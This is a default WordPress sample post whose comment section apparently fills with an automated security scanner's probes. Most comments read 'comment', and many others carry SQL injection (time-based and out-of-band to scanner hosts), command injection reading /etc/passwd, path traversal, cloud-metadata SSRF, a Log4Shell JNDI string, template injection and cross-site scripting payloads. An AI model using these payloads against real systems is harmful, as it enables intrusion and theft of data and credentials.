Welcome to WordPress. This is your first post. Edit or delete it, then start writing!
4,603 Responses
Howzit, this is a comment.
To get started with moderating, editing, and deleting comments, please visit the Comments screen in the dashboard.
Commenter avatars come from Gravatar.
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment and 1 in (select BENCHMARK(1,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(200000,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(15160,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(1050,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(79,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(5,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(0,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment’ and 1 in (select BENCHMARK(1,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(200000,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(16011,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(944,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(60,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(3,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(0,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select*from(select(sleep(00)))a) —
comment’ and 1 in (select*from(select(sleep(05)))a) —
Howzit, this is a comment.
To get started with moderating, editing, and deleting comments, please visit the Comments screen in the dashboard.
Commenter avatars come from Gravatar.
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment and 1 in (select BENCHMARK(1,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(200000,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(15160,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(1050,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(79,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(5,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(0,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment’ and 1 in (select BENCHMARK(1,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(200000,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(16011,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(944,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(60,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(3,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(0,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select*from(select(sleep(00)))a) —
comment’ and 1 in (select*from(select(sleep(05)))a) —
‘ (select*from(select(sleep(00)))a) ‘
‘ (select*from(select(sleep(05)))a) ‘
comment’);WAITFOR DELAY ’00:00:00′–
comment’);WAITFOR DELAY ’00:00:05′–
comment’ OR 1=0 ##
comment AND pg_sleep(00) is not null
comment AND pg_sleep(05) is not null
comment ‘;select pg_sleep(00);– –
comment ‘;select pg_sleep(05);– –
comment ;select pg_sleep(00);– –
comment ;select pg_sleep(05);– –
http://appspidered.rapid7.com/xss/script/234a7f1f8b50a6417a419feb48fc8c52dde6ff12
http://appspidered.rapid7.com/xss/script/24dc68ff64b2b640ec27ebe441cf51053ae869d2
http://appspidered.rapid7.com/xss/script/11a71d998c8f5ec0b9b28e5ca83ec940b7150ba4
http://appspidered.rapid7.com/xss/script/6422854eef0d4c49406c8314edbb2836f961626b
https://appspidered.rapid7.com/xss/script/2478b91ae3275805f723251db0604c48d3f69c2f
https://appspidered.rapid7.com/xss/script/0980c6ea0d8f1fe0eb57a13181daa3ea8a6fb24c
https://appspidered.rapid7.com/xss/script/f95a4a60a8162790cc7d32ad4f9be046751428e5
https://appspidered.rapid7.com/xss/script/18855319b5234e5223ce4c9eabadf00d54b0ec8a
http://appspidered.rapid7.com/xss/script/35c46a4b6d266328cfd0d98a2320dec601dfc46b
http://appspidered.rapid7.com/xss/script/2b2a01e93c60567dfbd8dfa68f38cda93a75e23e
http://appspidered.rapid7.com/xss/script/29ad3ecdbe93e57fdd132e08ec9011d66dc823ea
http://appspidered.rapid7.com/xss/script/6f4e90e7df0b0e4b84999aa99e71f67d60fe832d
https://appspidered.rapid7.com/xss/script/f6f420ee8ad4c41e514d5fd409563379a1d4a50a
https://appspidered.rapid7.com/xss/script/73d755983157a238dde5608932778a86f012d3b0
https://appspidered.rapid7.com/xss/script/3aab0178e076a4edd6d0f1185637cdf6160445fa
https://appspidered.rapid7.com/xss/script/8111d6a445ea34fdd400d7d71261ff712d56a4eb
appspidered.rapid7.com/xss/script/d9707cc2e614ef502d68c2bfad7f3a06e84a93d7
appspidered.rapid7.com/xss/script/0c07d088e4cf9ff5ea5d59dbe5487922d5e37005
appspidered.rapid7.com/xss/script/be4f6aa7d5f0c1bee2e63660109d07cbaddee78e
appspidered.rapid7.com/xss/script/9212b22f66b9ed42af9338024631557430708b6e
comment$0
comment;/etc/passwd
comment|/bin/cat /etc/passwd
comment|/bin/cat /etc/passwd|
comment;/etc/hosts
comment|/bin/cat /etc/hosts
comment|/bin/cat /etc/hosts|
comment;/usr/bin/id
comment|/bin/cat /usr/bin/id
comment|/bin/cat /usr/bin/id|
type c:\boot.ini
comment&dir
comment&ipconfig
echo foobar x7blfnox
comment&& echo foobar x7cdi0nj
comment| echo foobar x7c08108
comment| echo foobar x7dk78vf|
comment< echo foobar x7eg2geq
netstat -na
comment&&netstat -na
comment|netstat -na
comment|netstat -na|
comment;netstat ;
comment<netstat -na
ping -h
comment&&ping -h
comment|ping -h
comment|ping -h|
comment<ping -h
$LANG
comment&&$LANG
comment|$LANG
comment|$LANG|
comment<$LANG
; free
;ping localhost -c 21;
;TIMEOUT /T 10 /NOBREAK;
‘comment
comment’
comment”
comment%’
comment%u0027
comment%27
comment%”
comment%u0022
comment%22
< /etc/passwd
a
b
1e309
char(0x27)char(0x27)comment
%u2018comment
%u2019comment
%u201acomment
%u201bcomment
%u201ccomment
%u201dcomment
%u201ecomment
— comment
/*comment
commentʼ
{comment
{‘comment
{“comment
comment{
comment’}
comment”}
comment}
comment/
comment/’
comment/”
/’comment
comment”}, {x7eb33lk:{$meta: “textScore
comment’}, {x7e0gl0q:{$meta: ‘textScore
comment”}}, {x7fk19x5:{$meta: “textScore
comment’}, {x7gh5fnc:{$meta: ‘textScore
http://appspidered.rapid7.com/
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/network/interfaces/macs/
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
http://169.254.169.254/latest/dynamic/instance-identity/document
http://169.254.169.254/metadata/instance/compute?api-version=2019-08-15
http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0?api-version=2019-08-15
http://169.254.169.254/metadata/instance/network/interface/0?api-version=2019-08-15
${jndi:ldap://dcaf195b7ed8ae968d01f90ddcfcf35c716ecacb.oob.appspidered.rapid7.${lower:COM}}
comment” && sleep(00) && “1”!=”1
comment” && sleep(10000) && “1”!=”1
comment” && “1”==”0
comment” && “1”==”1
comment’ && ‘1’==’0
comment’ && ‘1’==’1
{{ 58719 * 21973 }}
{{ 62951705 + 74179523 }}
x7wnzt4v
x7w7y0y4
x7xskoww: x7xskoww
wp-comments-post.php
/etc/passwd
\WINDOWS\system32\drivers\etc\hosts
C:\WINDOWS\system32\drivers\etc\hosts
..\..\..\..\..\..\WINDOWS\system32\drivers\etc\hosts
..\..\..\..\..\..\WINDOWS\system32\drivers\etc\hosts.htm
/wp-comments-post.php
../../../../../../../../../../etc/hosts
< /etc/passwd
/.
\.
c:\.
appspidered.rapid7.com/
wp-comments-post.php.
../wp-comments-post.php.
../../wp-comments-post.php.
c:\boot.ini.
c:\boot.ini
d:\boot.ini
../../../../../../boot.ini.
../../../../../../boot.ini
noexistnoexist.
../../../../../../../../../../etc/hosts.
/..
\..
c:\..
/../../../../../../../../../../..
file:/etc/passwd
file:/wp-comments-post.php
/WEB-INF/web.xml
WEB-INF/web.xml
file:WEB-INF/web.xml
/../../WEB-INF/web.xml
\WEB-INF\web.xml
/../../../../../../../../../../.
noexistnoexist
http://localhost/
http://localhost:22/
package.json.bak
package.json.bak%00
../wp-config.php
http://appspidered.rapid7.com/rfi/x7pc7gay
/../../../../../../../../../../vendor.js
../../../../../
..\..\..\..\..\
x7situh9<x7situh9
x7s3figa’x7s3figa
x7txeape”x7txeape
x7uhzynk>x7uhzynk
x7u3ukrp
‘.phpinfo().’
LIMIT a
comment’ UNION ALL select NULL —
comment” UNION ALL select NULL —
SELECT * FROM “master”
SELECC * FROM “ds”
comment’;+exec+master..xp_dirtree+”//d321c494766ba7264dcbac8684952324c9919ce0.oob.appspidered.rapid7.com/a”–
comment’;+SELECT+*+FROM+OPENROWSET(‘SQLOLEDB’,+’b286e3ab234cb2fb4afad4d14467b1abe3cdd778.oob.appspidered.rapid7.com’;’sa’;’pwd’,+’SELECT+1′)–
comment’;+SELECT+LOAD_FILE(‘\\\\4797874ae2a257f9e4c7b2a244ae0f604be98f50.oob.appspidered.rapid7.com\\a’)#
comment’;+SELECT+’hello’+INTO+DUMPFILE+’\\\\004e9af3711787bea3139066690377556618dad1.oob.appspidered.rapid7.com\\a’#
comment’;+copy+(SELECT+”)+to+program+’nslookup+a3db8d21d603c0e3a954ee922a4e82c533389fc8.oob.appspidered.rapid7.com’–
comment’+ORDER+BY+(CASE+WHEN+(1=0)+THEN+NULL+ELSE+UTL_HTTP.REQUEST(‘http://8d108b9f3a85b3d94b7fd9e5353783b1058c4272.oob.appspidered.rapid7.com/’)+END)–
*
|
comment|
&
comment&
comment)
!comment
${applicationScope}
${requestScope}
${“asdflkj”.toString().replace(“d”,”x”)}
#{“asdflkj”.toString().replace(“d”,”x”)}
=alert(3824830)
=alert(3955991)
=alert(4115863)
=alert(4267542)
‘alert(4398702)
‘alert(4562661)
‘alert(4693860)
‘alert(4833246)
abc
abc
abc
abc
abc
comment”>
comment”>
comment”>
abc
abc
abc
@import’x7vjhwkn’;
@import’x7v33khn’;
@import’x7wmts5p’;
@import’x7w7fg21′;
ADw-script AD4-alert(8411899) ADw-/script AD4-
ADw-script AD4-alert(8551262) ADw-/script AD4-
+ADw-script+AD4-alert(8719351)+ADw-/script+AD4-
+ADw-script+AD4-alert(8858700)+ADw-/script+AD4-
abc
abc
abc
comment’>
comment’>
comment’>
alert`10260664`
alert`10416479`
alert`10564072`
alert`10715715`
prompt`10850976`
prompt`10982141`
prompt`11137915`
prompt`11273178`
top[‘al’ ‘ert’](11461686)
top[‘al’ ‘ert’](11609254)
top[‘al’+’ert’](11760935)
top[‘al’+’ert’](11900305)
aler\u0074(12035608);
aler\u0074(12211858);
aler\u0074(12359600);
aler\u0074(12531956);
MOUSEOVER ME
MOUSEOVER ME
MOUSEOVER ME
c
c
c
\”http://example.com/ ‘ onmouseover=alert(13663414) ‘
\”http://example.com/ ‘ onmouseover=alert(13790479) ‘
\”http://example.com/ ‘ onmouseover=alert(13925771) ‘
\”http://example.com/ ‘ onmouseover=alert(14052966) ‘
alert(14217024)
alert(14344117)
alert(14479344)
alert(14639182)
“><img src=x onerror="alert(14901562)
“><img src=x onerror="alert(15102413)
“><img src=x onerror="alert(15299300)
“><img src=x onerror="alert(15492190)
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
commentx7pt9zet
x7qrzl34′”x7qrzl34
comment
comment
comment
comment
${applicationScope}
${requestScope}
${“asdflkj”.toString().replace(“d”,”x”)}
#{“asdflkj”.toString().replace(“d”,”x”)}
comment” && sleep(00) && “1”!=”1
comment” && sleep(10000) && “1”!=”1
comment” && “1”==”0
comment” && “1”==”1
comment’ && ‘1’==’0
comment’ && ‘1’==’1
http://appspidered.rapid7.com/
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/network/interfaces/macs/
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
http://169.254.169.254/latest/dynamic/instance-identity/document
http://169.254.169.254/metadata/instance/compute?api-version=2019-08-15
http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0?api-version=2019-08-15
http://169.254.169.254/metadata/instance/network/interface/0?api-version=2019-08-15
${jndi:ldap://90cda5a7a977716c6c7b8dffc0187253953d5ec1.oob.appspidered.rapid7.${lower:COM}}
http://appspidered.rapid7.com/xss/script/b7688030f6f126954513ba4f59d0d8b16ec48010
http://appspidered.rapid7.com/xss/script/6994aaa2cacd8e31baa5da304ce0903951f674c9
http://appspidered.rapid7.com/xss/script/8941ffe5257444afe9fa565acd4c086a901f2aa4
http://appspidered.rapid7.com/xss/script/1d3a9c1edbc323b411f9e99364fe220c751b277a
https://appspidered.rapid7.com/xss/script/7a7ec4c7d0b688e728b02841139cb2ae0b644437
https://appspidered.rapid7.com/xss/script/bde7581e96794f5a32a4768be0ccbd6d4ab2fe4d
https://appspidered.rapid7.com/xss/script/8ff7c526ece3f739680d69cd8702f0513cca7159
https://appspidered.rapid7.com/xss/script/2d8323036fca7151feea110679aaa1592b472c13
http://appspidered.rapid7.com/xss/script/f32e87e178ede8b625e565132cb6f017834dec16
http://appspidered.rapid7.com/xss/script/c2459a1edf6ce939e593c3866eb516df4f302747
http://appspidered.rapid7.com/xss/script/f11d9123e1bb6eca2782814c37c756d5d27df7fc
http://appspidered.rapid7.com/xss/script/6150eddc167b8a7ad75368efe8be822053d9bfc2
https://appspidered.rapid7.com/xss/script/b03fdef101a4d5e0ee40c2e11ef8f66fef9c29db
https://appspidered.rapid7.com/xss/script/04028dbcd1bfe8d2d14a5fed30c502412d6e88c6
https://appspidered.rapid7.com/xss/script/0266c8df575145c25111cb3aa6ee60bd607ddf12
https://appspidered.rapid7.com/xss/script/b7b1857bb627b76219dae08c70297e8c65e10388
appspidered.rapid7.com/xss/script/7b6b92b42ffcd52c234adac7dcdd63dff62db249
appspidered.rapid7.com/xss/script/9a785caa30532bbda23d303a8c614478f4289637
appspidered.rapid7.com/xss/script/97293656c77c182c268e6f5ac3a112916d40ae5e
appspidered.rapid7.com/xss/script/27ca9a8d4af2f0854dcc55fe707897f7bcc8b9c2
commentcommentcomment
655321
./*][
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
comment’;+exec+master..xp_dirtree+”//36724ced599d57e8cb6974f81d3f1e986e6f12cc.oob.appspidered.rapid7.com/a”–
comment’;+SELECT+*+FROM+OPENROWSET(‘SQLOLEDB’,+’9c53af009a8383b6496d06a3888cdc3b951d002c.oob.appspidered.rapid7.com’;’sa’;’pwd’,+’SELECT+1′)–
comment’;+SELECT+LOAD_FILE(‘\\\\66c7658238e5ac702b42aca3e52f4a34bdda8b20.oob.appspidered.rapid7.com\\a’)#
comment’;+SELECT+’hello’+INTO+DUMPFILE+’\\\\cadb12334dc12b5c8733b4f074177ed7d76017af.oob.appspidered.rapid7.com\\a’#
comment’;+copy+(SELECT+”)+to+program+’nslookup+026b918de2f90e7d949ee4a6eb5416cc4534d195.oob.appspidered.rapid7.com’–
comment’+ORDER+BY+(CASE+WHEN+(1=0)+THEN+NULL+ELSE+UTL_HTTP.REQUEST(‘http://77e07ac1349f422f4500a51ec38016c1e95b50ea.oob.appspidered.rapid7.com/’)+END)–
{{ 58719 * 21973 }}
{{ 62951705 + 74179523 }}
*
|
comment|
&
comment&
comment)
!comment
‘comment
comment’
comment”
comment%’
comment%u0027
comment%27
comment%”
comment%u0022
comment%22
LIMIT a
1e309
char(0x27)char(0x27)comment
%u2018comment
%u2019comment
%u201acomment
%u201bcomment
%u201ccomment
%u201dcomment
%u201ecomment
— comment
/*comment
commentʼ
comment’ UNION ALL select NULL —
comment” UNION ALL select NULL —
SELECT * FROM “master”
SELECC * FROM “ds”
http://www.example.com/
https://example.com/
ftp://example.com/
http://example.com/
gopher://example.com/
example.com/
.example.com/
https://example.com/comment
‘.phpinfo().’
comment’ AND ‘1’=’0
comment’ AND ‘1’=’1
comment” AND “1”=”0
comment” AND “1”=”1
comment’ AND 1=0/*
comment’ AND 1=1/*
comment’ AND 1=0)/*
comment’ AND 1=1)/*
comment’ AND 1=0–
comment’ AND 1=1–
comment’ AND 1=0)–
comment’ AND 1=1)–
comment’) AND (‘1’=’0
comment’) AND (‘1’=’1
comment”) AND (“1″”=”0
comment”) AND (“1″”=”1
comment’ AND 1=0 LIMIT 1–
comment’ AND 1=1 LIMIT 1–
REPEAT(0x636f6d6d656e74,2)
REPEAT(0x636f6d6d656e74,1)
comment OR 1=1
comment OR 1=0
comment’ OR ‘1’=’1
comment’ OR ‘1’=’0
comment” OR “1”=”1
comment” OR “1”=”0
comment’) OR (‘1’=’1
comment’) OR (‘1’=’0
comment”) OR (“1″=”1
comment”) OR (“1″=”0
comment’ OR 1=1 ##
comment’ OR 1=0 ##
comment’ OR 1=1 —
comment’ OR 1=0 —
comment’) AND ‘1’ in (‘0
comment’) AND ‘1’ in (‘1
comment”) AND “1” in (“0
comment”) AND “1” in (“1
comment’) OR ‘1’ in (‘0
comment’) OR ‘1’ in (‘1
comment”) OR “1” in (“0
comment”) OR “1” in (“1
comment DESC
comment ASC
1, comment DESC
1, comment ASC
comment and 1 in (select BENCHMARK(1,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(200000,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(17520,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(1279,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(82,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(5,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(0,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment’ and 1 in (select BENCHMARK(1,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(200000,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(16538,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(1442,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(142,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(9,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(0,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select*from(select(sleep(00)))a) —
comment’ and 1 in (select*from(select(sleep(05)))a) —
‘ (select*from(select(sleep(00)))a) ‘
‘ (select*from(select(sleep(05)))a) ‘
comment’);WAITFOR DELAY ’00:00:00′–
comment’);WAITFOR DELAY ’00:00:05′–
comment AND pg_sleep(00) is not null
comment AND pg_sleep(05) is not null
comment ‘;select pg_sleep(00);– –
comment ‘;select pg_sleep(05);– –
comment ;select pg_sleep(00);– –
comment ;select pg_sleep(05);– –
comment
comment
=alert(135790)
=alert(434980)
=alert(586579)
=alert(758736)
‘alert(975929)
‘alert(1221833)
‘alert(1410438)
‘alert(1553857)
abc
abc
abc
abc
abc
comment”>
comment”>
comment”>
abc
abc
abc
@import’x75evcd4′;
@import’x7527uux’;
@import’x76o2gw4′;
@import’x77d1gg1′;
ADw-script AD4-alert(5418872) ADw-/script AD4-
ADw-script AD4-alert(5595166) ADw-/script AD4-
+ADw-script+AD4-alert(5775450)+ADw-/script+AD4-
+ADw-script+AD4-alert(5959906)+ADw-/script+AD4-
comment
comment
abc
abc
abc
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment’>
comment
comment
comment
comment
comment
comment
comment
comment
comment
alert`11723800`
alert`11785292`
comment
comment
alert`11973900`
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
aler\u0074(12330765);
MOUSEOVER ME
MOUSEOVER ME
comment
comment
comment
comment
comment
comment
comment
“><img src=x onerror="alert(13128072)
comment
“><img src=x onerror="alert(13308356)
alert(13472291)
alert(13632116)
alert(13792249)
alert(13936110)
comment
comment
comment
“>alert(14158112)
comment
‘>alert(14433235)
comment
comment
“>
comment
‘>
‘>
comment
comment
‘>
x7d56r2a’x7d56r2a
comment| echo foobar x7eexfak|
comment|$LANG
\.
\..
http://localhost:22/
..\..\..\..\..\
{comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
